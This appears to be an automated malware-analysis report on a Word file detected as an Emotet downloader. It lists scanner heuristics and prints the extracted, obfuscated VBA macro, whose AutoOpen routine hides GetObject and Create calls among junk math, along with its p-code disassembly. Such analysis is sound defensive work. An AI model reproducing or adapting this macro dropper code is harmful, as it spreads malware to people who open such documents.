MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6916023-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6916023-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26170 bytes |
SHA-256: 0624e3a9dfc4e8fea656e3a5912ae23e728a785c7e16ffb23dde8669c4f99803 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OABDAA4B"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WAQGQ_A"
Attribute VB_Base = "0{F78B3326-73C5-49FA-83B1-F914BD7BCED9}{76C56B2B-F667-46EB-A4CB-9CA2B2A26779}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YxAAAAA"
Attribute VB_Base = "0{E8AB5339-ABEA-475F-967A-7478265F5E51}{2E746637-CF13-4006-B4BA-07560D47BAFC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAUkUkwC"
Function bAGQcZQ()
If nkUAkDkB = dUBGGAG Then
Set WDDwZA = Y4wAZACU
kxCBCwAU = tADAB_U - 793041893 - 678518978 + Log(912702890 - Atn(r_AcGoD / OoACwAB + ODxAxxwA / Tan(892972071))) * (9805233 + Sgn(844868100 / Sin(tQkXZAcB)))
Set cA4BAUA = iAABQDA
End If
If YAxAA4wo = vQX_4_D Then
Set wAAUCABo = BkABAABD
tAAAC4CX = oA1oADU - 623682577 - 88326582 + Log(187652900 - Atn(jcZQAcBG / zDAAAA + ZAADkU / Tan(814735075))) * (765239317 + Sgn(288893129 / Sin(z1wAAA)))
Set WDcDA_GG = hA1oQU
End If
End Function
Function rkUZG44()
If QBQA4ADD = iA4ZkG Then
Set jxCZAU = oA4XwD
toAQAB = cX_BXQAD - 499542368 - 430068787 + Log(833316797 - Atn(rAAAAAA_ / ZXA4wwAA + GCBACc / Tan(476432))) * (604807402 + Sgn(243641689 / Sin(NoAAD1AA)))
Set SQACUQ = HDZAZooC
End If
If NUAkAUA = zBAQA_A Then
Set SDBAQADA = KoxAA_Dc
nooACCZD = wAQAAD - 991857155 - 123257249 + Log(915056874 - Atn(fB4wACBQ / XkGA__ZX + PwAU_kU / Tan(612874817))) * (561123561 + Sgn(467696617 / Sin(SDkA1B)))
Set w1DZQAk1 = YCDUAUQ
End If
If bxCwoB = cxwBAQ Then
Set EDZAAGZx = fAAAZU
aDUAAcAc = nBGBZA - 407577260 - 715352754 + Log(505597967 - Atn(rQAGBcDA / sCcACA1 + EAAD1UA / Tan(38370891))) * (548844692 + Sgn(219063213 / Sin(tDAGBQkw)))
Set DkGooGQ = GUx_QBAA
End If
End Function
Sub autoopen()
dX1AxA
End Sub
Function dX1AxA()
On Error Resume Next
If rABAk44 = NQC1ok Then
Set DAACQAA = OAAGXAG
BZUkUQw = VAkAA4 - 474084368 - 294512251 + Log(318978175 - Atn(DXAAGAo / DAAGUDA + RkAABAXA / Tan(647041776))) * (605079216 + Sgn(456131464 / Sin(iGAUBUQ_)))
Set WoxQAAw = aDcoUU4
End If
If KwXAkA = ucAxoA Then
Set w4ZAAZ = voDCkx
lADDBQx = jXQAAA - 449876047 - 468306839 + Log(868991172 - Atn(LCxUZAA / uAoQx1A + jXBBABAX / Tan(123270619))) * (158819329 + Sgn(542486386 / Sin(N4UXQQU)))
Set SAAUQAA = OAUAXAG
End If
Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText)
If LGAAAAAx = SAAwcUAX Then
Set m14GBD = I1CUXUB
PUoAAA = zDwAADA - 464750075 - 53565047 + Log(955061135 - Atn(z4_AoB / i4DDAQQQ + zoUXox / Tan(818091502))) * (174085200 + Sgn(827388599 / Sin(MkACAAU)))
Set CCDABAcB = dADQxAGA
End If
If WAAxAQ = tQAQAD Then
Set DcAcGAZD = EQAAAZkB
kCwABAZ = nCAAACB - 285121965 - 408145712 + Log(487130502 - Atn(PQUAQAkw / w1AXkAC + G4cUAADA / Tan(814222785))) * (731319692 + Sgn(217045064 / Sin(M4AABoD)))
Set kQDckD_ = Q1QUAAAZ
End If
If mZAQAAD = T1GUQ_BA Then
Set vcAXBBww = qBQQAXAQ
DcAABG = QUxAXZU - 601914844 - 79381524 + Log(307534097 - Atn(DAAAXAZA / qxABAAA + HAGAAAc / Tan(380049161))) * (293734612 + Sgn(388563309 / Sin(RBBxAA)))
Set CXU_CA = R4_CGCAG
End If
If 244778 = 244778 Then
If ToCAQAA = BBAX1B Then
Set EGUAXQAo = bQUUZA_
nGwBAoAG = VQUDAAQA - 784054506 - 167861156 + Log(93894239 - Atn(dUoGoADx / z4woAQo + AAQUBU / Tan(40677750))) * (464975096 + Sgn(742242790 / Sin(mAUoAA1w)))
Set cUUUA_k = UAocxAAc
End If
If QkUZBc = kAXDXG Then
Set wcQAUw_Q = MDUoDA
GAw_AA = rAAwGAB - 983278805 - 892256856 + Log(834086417 - Atn(jkABAZ / TBDQZBBU + iAUAD1w / Tan(121687673))) * (399790595 + Sgn(87188278 / Sin(zAc1AxkD)))
Set jkcxAQAB = bUXDAA
End If
hU4w_A.ShOwWiNdOw = WAQGQ_A.NGBCBCQ + WAQGQ_A.NGBCBCQ + WAQGQ_A.NGBCBCQ
If dw1AABD = VwAXQ1 Then
Set vAAAQAk = hACAcBkB
EG1QwU = iUAowDA - 679671368 - 243157385 + Log(554719575 - Atn(JAx_AD1Z / HAkcAU4 + lA4QwA / Tan(779998566))) * (35456365 + Sgn(611478291 / Sin(fBG4kC)))
Set ikACcwAB = wQDUZA
End If
If iDAQADAc = aDDA1QA4 Then
Set CUAQw4x = NAk_AU
tAACQC = Rx4UUk4G - 488508389 - 881119982 + Log(181117675 - Atn(PwDAoDxU / fDQCQc + XAQoBUB / Tan(739477677))) * (127057589 + Sgn(110399350 / Sin(IQUQB4UA)))
Set LUAUxDB = jADUACAG
End If
If vQAA1QDX = bxUDwQB Then
Set ZADoQAZ = GDU_wZ1
wDCwUQ = GoQAxDxD - 487326820 - 126290497 + Log(821295315 - Atn(QQQAAc / oAA_AA + NwAAQX4 / Tan(728171898))) * (502161859 + Sgn(109468764 / Sin(TAD_BAA)))
Set VAQDGAc = iAXAwo_
End If
End If
If FAcDoBQ = QkkBZBB Then
Set t1DAAwAA = Fk4DDQA
rx4A_AAA = PABBwUQA - 317837484 - 821931886 + Log(780372939 - Atn(nAAwUAAA / qAAAkA + uAXAUQQ / Tan(396024675))) * (669398846 + Sgn(574816754 / Sin(ACwABD)))
Set RAACAAA = HUAAAoB
End If
If DUo1_B = pDQA_AAQ Then
Set iwoADAB = KBQABU1
z4AAAkG = EoAAAx - 127790723 - 647266175 + Log(118224054 - Atn(PAAwAwCx / tXU_AwCw + YAAADZoU / Tan(785043832))) * (687751938 + Sgn(935328402 / Sin(z1CAX1)))
Set iCwwUQ = nXAXD_G
End If
Call GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.KUQAAA + WAQGQ_A.oDA4Ao4.Text).Create((WAQGQ_A.oDA4Ao4 + YxAAAAA.AQoGAG + WAQGQ_A.oDA4Ao4.ControlTipText + YxAAAAA.PkAoxDQ + WAQGQ_A.oDA4Ao4 + WAQGQ_A.oDA4Ao4.Text + YxAAAAA.IUBBAU1 + WAQGQ_A.oDA4Ao4 + WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.rkBD1oAA + WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.wABDAA + WAQGQ_A.oDA4Ao4.ControlSource), hDQwBxBx, hU4w_A, WAQGQ_A.oDA4Ao4.ControlSource)
If zwCCAU = KBUGAU Then
Set tQAcCAAD = mAABZXG
JDABwAA = AQDGkUU - 182919802 - 145571059 + Log(171680326 - Atn(CBGQA_ZD / zQ14QAA + vcUAQ1A / Tan(43329969))) * (226710243 + Sgn(129117487 / Sin(a4_kZA)))
Set KBUDZQA = sBABBDc
End If
If QAAAkcD = vcoACA Then
Set mAAGB1Dc = MAGAAAXZ
PwQADQAA = sowBAX - 110256546 - 861939245 + Log(756925589 - Atn(MQAkoQQ / D_1kGZAZ + BBwAcDZk / Tan(387264946))) * (236340761 + Sgn(50725777 / Sin(lAA_4X_A)))
Set DxUBkowA = z1ZxQXA
End If
End Function
Function M4UAwx()
If jQxD1U = mA4UAx Then
Set zQ_DAAQ = F4xkA_
wADkAx = jAGowA - 443450473 - 176588512 + Log(201200481 - Atn(wZxAx4 / oDkAAA + OQ1UQUAQ / Tan(148514136))) * (832511003 + Sgn(524466753 / Sin(IBA1Ac4c)))
Set bDBACQ = NAZAAA
End If
If iAAA4AxQ = dXZQADA Then
Set jCAAD1 = L_D4kDA1
WUQDDUGA = IADAAAAA - 328298126 - 94337995 + Log(60057446 - Atn(zA1BAA / MAAAAwA4 + nAo4ADA1 / Tan(977863082))) * (923808396 + Sgn(885149480 / Sin(iAAAQAQ)))
Set RBAx_QAA = Xk1AXD
End If
If QX_xDAQQ = dD_QkDo Then
Set nAZZAD = qkcQAAD
LBACCX = LBUDB4kA - 408845218 - 554638521 + Log(633056210 - Atn(HC_GCU4A / GxAAAG1A + bkwZxAQB / Tan(720887155))) * (844368888 + Sgn(703938703 / Sin(fDABAcQA)))
Set A1AA_Akk = wAxUcGUo
End If
End Function
Function H_ZXDAU()
If iAXZcQ = HUQZDAU Then
Set EAGDAQ = i4GDXcUA
b_DZAw = GxBGZZAU - 555149726 - 240404558 + Log(232488251 - Atn(SUAUAA / VDQUcAUC + X_4AQXA / Tan(116340228))) * (150506846 + Sgn(447193145 / Sin(IZGxADA)))
Set oABUAA = RAAcAQZ
End If
If XwQX_A = pQBBQBA Then
Set JADcUBAD = iAC4xQ
bDwxDU = wACBDXU - 597960474 - 924491957 + Log(45872867 - Atn(mDZDcQ / sCBAQBD + IQGADBc / Tan(138929118))) * (926086097 + Sgn(213405618 / Sin(RGCxA1)))
Set GxBGQQA = owAxCQAB
End If
If AAAUXQA = PAZQUG Then
Set iUGxQBB = kAUQAo
jXUGUk = SBkxBAA - 869804522 - 65988123 + Log(136157125 - Atn(fwA1kAA / bAAkQx_A + dDAAxU / Tan(244800465))) * (190272412 + Sgn(657328002 / Sin(YQcCU_oD)))
Set QcQBXD = CAwXo1
End If
End Function
' Processing file: /opt/analyzer/scan_staging/2bdb9c37b9694ac598c0a48e14e82e54.bin
' ===============================================================================
' Module streams:
' Macros/VBA/OABDAA4B - 1106 bytes
' Macros/VBA/WAQGQ_A - 1158 bytes
' Macros/VBA/YxAAAAA - 1156 bytes
' Macros/VBA/wAUkUkwC - 12291 bytes
' Line #0:
' FuncDefn (Function wAUkUkwC())
' Line #1:
' Ld bAGQcZQ
' Ld nkUAkDkB
' Eq
' IfBlock
' Line #2:
' SetStmt
' Ld WDDwZA
' Set dUBGGAG
' Line #3:
' Ld kxCBCwAU
' LitDI4 0xDBE5 0x2F44
' Sub
' LitDI4 0x60C2 0x2871
' Sub
' LitDI4 0xBDAA 0x3666
' Ld tADAB_U
' Ld r_AcGoD
' Div
' Ld OoACwAB
' LitDI4 0xAC27 0x3539
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x9DB1 0x0095
' LitDI4 0xAA04 0x325B
' Ld ODxAxxwA
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St Y4wAZACU
' Line #4:
' SetStmt
' Ld cA4BAUA
' Set tQkXZAcB
' Line #5:
' EndIfBlock
' Line #6:
' Ld iAABQDA
' Ld YAxAA4wo
' Eq
' IfBlock
' Line #7:
' SetStmt
' Ld wAAUCABo
' Set vQX_4_D
' Line #8:
' Ld tAAAC4CX
' LitDI4 0xA411 0x252C
' Sub
' LitDI4 0xC1B6 0x0543
' Sub
' LitDI4 0x5B24 0x0B2F
' Ld oA1oADU
' Ld jcZQAcBG
' Div
' Ld zDAAAA
' LitDI4 0xDEE3 0x308F
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xA015 0x2D9C
' LitDI4 0x28C9 0x1138
' Ld ZAADkU
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St BkABAABD
' Line #9:
' SetStmt
' Ld WDcDA_GG
' Set z1wAAA
' Line #10:
' EndIfBlock
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Function hA1oQU())
' Line #13:
' Ld rkUZG44
' Ld QBQA4ADD
' Eq
' IfBlock
' Line #14:
' SetStmt
' Ld jxCZAU
' Set iA4ZkG
' Line #15:
' Ld toAQAB
' LitDI4 0x6960 0x1DC6
' Sub
' LitDI4 0x5433 0x19A2
' Sub
' LitDI4 0x67BD 0x31AB
' Ld cX_BXQAD
' Ld rAAAAAA_
' Div
' Ld ZXA4wwAA
' LitDI4 0x4510 0x0007
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xA0EA 0x240C
' LitDI4 0xAD59 0x0E85
' Ld GCBACc
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St oA4XwD
' Line #16:
' SetStmt
' Ld SQACUQ
' Set NoAAD1AA
' Line #17:
' EndIfBlock
' Line #18:
' Ld HDZAZooC
' Ld NUAkAUA
' Eq
' IfBlock
' Line #19:
' SetStmt
' Ld SDBAQADA
' Set zBAQA_A
' Line #20:
' Ld nooACCZD
' LitDI4 0x8A03 0x3B1E
' Sub
' LitDI4 0xC1A1 0x0758
' Sub
' LitDI4 0xA8EA 0x368A
' Ld wAQAAD
' Ld fB4wACBQ
' Div
' Ld XkGA__ZX
' LitDI4 0xBA41 0x2487
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x10E9 0x2172
' LitDI4 0x7BE9 0x1BE0
' Ld PwAU_kU
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St KoxAA_Dc
' Line #21:
' SetStmt
' Ld w1DZQAk1
' Set SDkA1B
' Line #22:
' EndIfBlock
' Line #23:
' Ld YCDUAUQ
' Ld bxCwoB
' Eq
' IfBlock
' Line #24:
' SetStmt
' Ld EDZAAGZx
' Set cxwBAQ
' Line #25:
' Ld aDUAAcAc
' LitDI4 0x22AC 0x184B
' Sub
' LitDI4 0x6AB2 0x2AA3
' Sub
' LitDI4 0xD00F 0x1E22
' Ld nBGBZA
' Ld rQAGBcDA
' Div
' Ld sCcACA1
' LitDI4 0x7E4B 0x0249
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xB494 0x20B6
' LitDI4 0xA3AD 0x0D0E
' Ld EAAD1UA
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St fAAAZU
' Line #26:
' SetStmt
' Ld DkGooGQ
' Set tDAGBQkw
' Line #27:
' EndIfBlock
' Line #28:
' EndFunc
' Line #29:
' FuncDefn (Sub GUx_QBAA())
' Line #30:
' ArgsCall autoopen 0x0000
' Line #31:
' EndSub
' Line #32:
' FuncDefn (Function autoopen())
' Line #33:
' OnError (Resume Next)
' Line #34:
' Ld dX1AxA
' Ld rABAk44
' Eq
' IfBlock
' Line #35:
' SetStmt
' Ld DAACQAA
' Set NQC1ok
' Line #36:
' Ld BZUkUQw
' LitDI4 0xF410 0x1C41
' Sub
' LitDI4 0xE67B 0x118D
' Sub
' LitDI4 0x387F 0x1303
' Ld VAkAA4
' Ld DXAAGAo
' Div
' Ld DAAGUDA
' LitDI4 0x12F0 0x2691
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xC6B0 0x2410
' LitDI4 0x0388 0x1B30
' Ld RkAABAXA
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St OAAGXAG
' Line #37:
' SetStmt
' Ld WoxQAAw
' Set iGAUBUQ_
' Line #38:
' EndIfBlock
' Line #39:
' Ld aDcoUU4
' Ld KwXAkA
' Eq
' IfBlock
' Line #40:
' SetStmt
' Ld w4ZAAZ
' Set ucAxoA
' Line #41:
' Ld lADDBQx
' LitDI4 0x904F 0x1AD0
' Sub
' LitDI4 0xCB97 0x1BE9
' Sub
' LitDI4 0xC0C4 0x33CB
' Ld jXQAAA
' Ld LCxUZAA
' Div
' Ld uAoQx1A
' LitDI4 0xF5DB 0x0758
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x6401 0x0977
' LitDI4 0xAF72 0x2055
' Ld jXBBABAX
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St voDCkx
' Line #42:
' SetStmt
' Ld SAAUQAA
' Set N4UXQQU
' Line #43:
' EndIfBlock
' Line #44:
' SetStmt
' Ld YxAAAAA
' MemLd GetObject
' MemLd oDA4Ao4
' Ld MSForms
' MemLd ControlSource
' Add
' Ld YxAAAAA
' MemLd GetObject
' MemLd Form
' Add
' ArgsLd hU4w_A 0x0001
' Set OAUAXAG
' Line #45:
' Ld lDwBAB4
' Ld LGAAAAAx
' Eq
' IfBlock
' Line #46:
' SetStmt
' Ld m14GBD
' Set SAAwcUAX
' Line #47:
' Ld PUoAAA
' LitDI4 0x85FB 0x1BB3
' Sub
' LitDI4 0x5677 0x0331
' Sub
' LitDI4 0x138F 0x38ED
' Ld zDwAADA
' Ld z4_AoB
' Div
' Ld i4DDAQQQ
' LitDI4 0x15EE 0x30C3
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x5450 0x0A60
' LitDI4 0xF2B7 0x3150
' Ld zoUXox
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St I1CUXUB
' Line #48:
' SetStmt
' Ld CCDABAcB
' Set MkACAAU
' Line #49:
' EndIfBlock
' Line #50:
' Ld dADQxAGA
' Ld WAAxAQ
' Eq
' IfBlock
' Line #51:
' SetStmt
' Ld DcAcGAZD
' Set tQAQAD
' Line #52:
' Ld kCwABAZ
' LitDI4 0x9DAD 0x10FE
' Sub
' LitDI4 0xCF30 0x1853
' Sub
' LitDI4 0x0586 0x1D09
' Ld nCAAACB
' Ld PQUAQAkw
' Div
' Ld w1AXkAC
' LitDI4 0x0DC1 0x3088
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x0D8C 0x2B97
' LitDI4 0xD848 0x0CEF
' Ld G4cUAADA
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St EQAAAZkB
' Line #53:
' SetStmt
' Ld kQDckD_
' Set M4AABoD
' Line #54:
' EndIfBlock
' Line #55:
' Ld Q1QUAAAZ
' Ld mZAQAAD
' Eq
' IfBlock
' Line #56:
' SetStmt
' Ld vcAXBBww
' Set T1GUQ_BA
' Line #57:
' Ld DcAABG
' LitDI4 0x7DDC 0x23E0
' Sub
' LitDI4 0x4414 0x04BB
' Sub
' LitDI4 0x9911 0x1254
' Ld QUxAXZU
' Ld DAAAXAZA
' Div
' Ld qxABAAA
' LitDI4 0x1709 0x16A7
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x08D4 0x1182
' LitDI4 0x016D 0x1729
' Ld HAGAAAc
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St qBQQAXAQ
' Line #58:
' SetStmt
' Ld CXU_CA
' Set RBBxAA
' Line #59:
' EndIfBlock
' Line #60:
' LitDI4 0xBC2A 0x0003
' LitDI4 0xBC2A 0x0003
' Eq
' IfBlock
' Line #61:
' Ld R4_CGCAG
' Ld ToCAQAA
' Eq
' IfBlock
' Line #62:
' SetStmt
' Ld EGUAXQAo
' Set BBAX1B
' Line #63:
' Ld nGwBAoAG
' LitDI4 0xB8EA 0x2EBB
' Sub
' LitDI4 0x5BA4 0x0A01
' Sub
' LitDI4 0xB65F 0x0598
' Ld VQUDAAQA
' Ld dUoGoADx
' Div
' Ld z4woAQo
' LitDI4 0xB176 0x026C
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xF4F8 0x1BB6
' LitDI4 0xB9E6 0x2C3D
' Ld AAQUBU
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St bQUUZA_
' Line #64:
' SetStmt
' Ld cUUUA_k
' Set mAUoAA1w
' Line #65:
' EndIfBlock
' Line #66:
' Ld UAocxAAc
' Ld QkUZBc
' Eq
' IfBlock
' Line #67:
' SetStmt
' Ld wcQAUw_Q
' Set kAXDXG
' Line #68:
' Ld GAw_AA
' LitDI4 0xA4D5 0x3A9B
' Sub
' LitDI4 0xC258 0x352E
' Sub
' LitDI4 0x2611 0x31B7
' Ld rAAwGAB
' Ld jkABAZ
' Div
' Ld TBDQZBBU
' LitDI4 0xCE79 0x0740
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x5203 0x17D4
' LitDI4 0x6336 0x0532
' Ld iAUAD1w
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St MDUoDA
' Line #69:
' SetStmt
' Ld jkcxAQAB
' Set zAc1AxkD
' Line #70:
' EndIfBlock
' Line #71:
' Ld YxAAAAA
' MemLd ShOwWiNdOw
' Ld YxAAAAA
' MemLd ShOwWiNdOw
' Add
' Ld YxAAAAA
' MemLd ShOwWiNdOw
' Add
' Ld OAUAXAG
' MemSt bUXDAA
' Line #72:
' Ld NGBCBCQ
' Ld dw1AABD
' Eq
' IfBlock
' Line #73:
' SetStmt
' Ld vAAAQAk
' Set VwAXQ1
' Line #74:
' Ld EG1QwU
' LitDI4 0xF648 0x2882
' Sub
' LitDI4 0x4989 0x0E7E
' Sub
' LitDI4 0x5957 0x2110
' Ld iUAowDA
' Ld JAx_AD1Z
' Div
' Ld HAkcAU4
' LitDI4 0xD566 0x2E7D
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x056D 0x021D
' LitDI4 0x6B13 0x2472
' Ld lA4QwA
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St hACAcBkB
' Line #75:
' SetStmt
' Ld ikACcwAB
' Set fBG4kC
' Line #76:
' EndIfBlock
' Line #77:
' Ld wQDUZA
' Ld iDAQADAc
' Eq
' IfBlock
' Line #78:
' SetStmt
' Ld CUAQw4x
' Set aDDA1QA4
' Line #79:
' Ld tAACQC
' LitDI4 0x0BE5 0x1D1E
' Sub
' LitDI4 0xD2EE 0x3484
' Sub
' LitDI4 0xA2EB 0x0ACB
' Ld Rx4UUk4G
' Ld PwDAoDxU
' Div
' Ld fDQCQc
' LitDI4 0x88AD 0x2C13
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0xBEB5 0x0792
' LitDI4 0x8F76 0x0694
' Ld XAQoBUB
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St NAk_AU
' Line #80:
' SetStmt
' Ld LUAUxDB
' Set IQUQB4UA
' Line #81:
' EndIfBlock
' Line #82:
' Ld jADUACAG
' Ld vQAA1QDX
' Eq
' IfBlock
' Line #83:
' SetStmt
' Ld ZADoQAZ
' Set bxUDwQB
' Line #84:
' Ld wDCwUQ
' LitDI4 0x0464 0x1D0C
' Sub
' LitDI4 0x0A41 0x0787
' Sub
' LitDI4 0xF8D3 0x30F3
' Ld GoQAxDxD
' Ld QQQAAc
' Div
' Ld oAA_AA
' LitDI4 0x057A 0x2B67
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x61C3 0x1DEE
' LitDI4 0x5C5C 0x0686
' Ld NwAAQX4
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St GDU_wZ1
' Line #85:
' SetStmt
' Ld VAQDGAc
' Set TAD_BAA
' Line #86:
' EndIfBlock
' Line #87:
' EndIfBlock
' Line #88:
' Ld iAXAwo_
' Ld FAcDoBQ
' Eq
' IfBlock
' Line #89:
' SetStmt
' Ld t1DAAwAA
' Set QkkBZBB
' Line #90:
' Ld rx4A_AAA
' LitDI4 0xD0AC 0x12F1
' Sub
' LitDI4 0xAF6E 0x30FD
' Sub
' LitDI4 0x8BCB 0x2E83
' Ld PABBwUQA
' Ld nAAwUAAA
' Div
' Ld qAAAkA
' LitDI4 0xDB63 0x179A
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x373E 0x27E6
' LitDI4 0x01F2 0x2243
' Ld uAXAUQQ
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St Fk4DDQA
' Line #91:
' SetStmt
' Ld RAACAAA
' Set ACwABD
' Line #92:
' EndIfBlock
' Line #93:
' Ld HUAAAoB
' Ld DUo1_B
' Eq
' IfBlock
' Line #94:
' SetStmt
' Ld iwoADAB
' Set pDQA_AAQ
' Line #95:
' Ld z4AAAkG
' LitDI4 0xEE83 0x079D
' Sub
' LitDI4 0x7F7F 0x2694
' Sub
' LitDI4 0xF4B6 0x070B
' Ld EoAAAx
' Ld PAAwAwCx
' Div
' Ld tXU_AwCw
' LitDI4 0xD178 0x2ECA
' ArgsLd Tan 0x0001
' Div
' Add
' ArgsLd Atn 0x0001
' Sub
' ArgsLd Log 0x0001
' LitDI4 0x4302 0x28FE
' LitDI4 0xFA92 0x37BF
' Ld YAAADZoU
' ArgsLd Sin 0x0001
' Div
' FnSgn
' Add
' Paren
' Mul
' Add
' St KBQABU1
' Line #96:
' SetStmt
' Ld iCwwUQ
' Set z1CAX1
' Line #97:
' EndIfBlock
' Line #98:
' Ld YxAAAAA
' MemLd GetObject
' Ld MSForms
' MemLd Create
' Add
' Ld YxAAAAA
' MemLd GetObject
' MemLd Form
' Add
' Ld MSForms
' MemLd AQoGAG
' Add
' Ld YxAAAAA
' MemLd GetObject
' Add
' Ld YxAAAAA
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd PkAoxDQ
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.